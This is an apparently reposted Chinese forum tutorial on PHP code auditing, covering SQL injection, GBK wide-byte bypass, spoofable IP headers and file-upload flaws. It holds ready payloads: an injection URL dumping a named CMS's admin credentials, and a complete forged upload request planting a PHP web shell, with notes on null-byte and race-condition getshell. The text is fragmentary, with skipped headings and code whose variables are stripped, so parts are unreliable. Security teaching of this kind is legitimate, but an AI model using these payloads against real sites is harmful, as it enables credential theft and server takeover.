php代码审计基础笔记
出处: 九零SEC
连接:http://forum.90sec.org/forum.php?mod=viewthread&tid=8059
----------------------------------------------------------
team:xdsec&90sec
author:wilson
blog:http://blog.wils0n.cn/
文章链接:wilson‘s blog_php代码审计基础笔记[求人气~~]
-------------------------------------------------------------
0x01 前言
0x01 漏洞原理
01.对于数字型的输入,直接使用intval($_GET[id]),强制转换成整数,这种过滤是毫无办法的。 $ann_id = !empty($_REQUEST[‘ann_id‘]) ? intval($_REQUEST[‘ann_id‘]) : ‘‘; 要是没有intval($_GET[id]) 那就呵呵了。//有一个屌丝cms就是这样...... ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,(select%20concat(admin_name,0x23,email,0x23,pwd)%20from%20blue_admin) 02.有些输入是字符型的,不可能转换成数字。这个使用就使用addslashes对输入进行转义。 aaa’aa ==> aaa\’aa aaa\aa ==> aaa\\aa SELECT * FROM post WHERE id=’aaa\’ union select pwd from admin limit 0,1#
--------------------------------
0x02 漏洞发生
那么问题来了,在上面这种情况漏洞怎么出现?[蓝翔.....]
mysql_query("SET character_set_connection=gbk,character_set_results=gbk,character_set_client=binary", $conn);
0x03 注入类型
//字符串完全没过滤,gpc为关闭 function guest_add()//添加留言 { global $bqz,$lang; $exec="insert into ".$bqz."guest (title,name,email,ip,content,times) values (‘".$_POST."‘,‘".$_POST."‘,‘".$_POST."‘,‘".$_SERVER."‘,‘".$_POST."‘,‘".time()."‘)"; mysql_query($exec)||die(mysqli_error()); echo "<script>alert(‘".$lang."‘);window.location.href=‘http://bbs.xdsec.org/?/guest.php‘;</script>"; } $exec="insert into ".$bqz."guest (title,name,email,ip,content,times) values (‘".$_POST."‘,‘".$_POST."‘,‘".$_POST."‘,‘".$_SERVER."‘,‘".$_POST."‘,‘".time()."‘)"; //没有过滤就将数据放入guest表中,guest表的内容前台可见。
=====================================================
/** * 获取客户端 IP 地址 */ public static function getip() { $onlineip = ‘‘; if (getenv(‘HTTP_CLIENT_IP‘) && strcasecmp(getenv(‘HTTP_CLIENT_IP‘), ‘unknown‘)) { $onlineip = getenv(‘HTTP_CLIENT_IP‘); } elseif (getenv(‘HTTP_X_FORWARDED_FOR‘) && strcasecmp(getenv(‘HTTP_X_FORWARDED_FOR‘), ‘unknown‘)) { $onlineip = getenv(‘HTTP_X_FORWARDED_FOR‘); } elseif (getenv(‘REMOTE_ADDR‘) && strcasecmp(getenv(‘REMOTE_ADDR‘), ‘unknown‘)) { $onlineip = getenv(‘REMOTE_ADDR‘); } elseif (isset($_SERVER[‘REMOTE_ADDR‘]) && $_SERVER[‘REMOTE_ADDR‘] && strcasecmp($_SERVER[‘REMOTE_ADDR‘], ‘unknown‘)) { $onlineip = $_SERVER[‘REMOTE_ADDR‘]; } return $onlineip; }
$.ajax({ "url": "网址", "type": "POST","data":"POST的内容" })
4.命令执行审计技巧
--------------
5.2文件上传漏洞 来自[+]上传攻击总结.pdf[这极好的文章]
class upload { private $allow_image_type = array(‘image/jpg‘, ‘image/gif‘, ‘image/png‘, ‘image/pjpeg‘); ...... function img_upload($file, $dir = ‘‘, $imgname = ‘‘){ if(empty($dir)){ $dir = BLUE_ROOT.DATA.UPLOAD.date("Ym")."/"; }else{ $dir = BLUE_ROOT.DATA.UPLOAD.$dir."/"; } if(!file_exists($dir)){ if(!mkdir($dir)){ showmsg(‘上传过程中创建目录失败‘); } } if(empty($imgname)){ $imgname = $this->create_tempname().$this->get_type($file[‘name‘]); } $imgname = $dir . $imgname; if(!in_array($file[‘type‘],$this->allow_image_type)){ //只是检测了文件头部来着,那我们就直接构造一个SHELL就好了 showmsg(‘不允许的图片类型‘); } }
Payload:
然后我们可以将request 包的Content-Type 修改
POST /upload.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: localhost
User-Agent: libwww-perl/5.803
Content-Type: multipart/form-data; boundary=xYzZY
Content-Length: 155
--xYzZY
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: image/gif (原为Content-Type: text/plain)//$_FILES["file"]["type"]
<?php system($_GET[‘command‘]);?>
--xYzZY--
3.服务器检测绕过(目录路径检测)
Filename 可以控制,直接进行%00截断看看能不能搞定
4.文件名检测
下面就是去检测:$_FILES["file"]["name"]
再次注意:如果文件名进入数据库也有可能造成注入的。
5.文件上传逻辑漏洞
http://www.leavesongs.com/PENETRATION/after-phpcms-upload-vul.html
不得不又一次膜拜p神......
文件上传,支持zip上传,但是这个phpcms没有对子目录下的文件,进行验证。导致getshell
而且有了一个竞争上传的概念。。。。
文件是先在服务器存在了,然后再验证文件名的可靠性。不合法就删除。那就出现问题了,在存在时候,我们可以一整去访问这个php,而这个php的功能就是写马。这样就可以成功getshell了。。。。
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。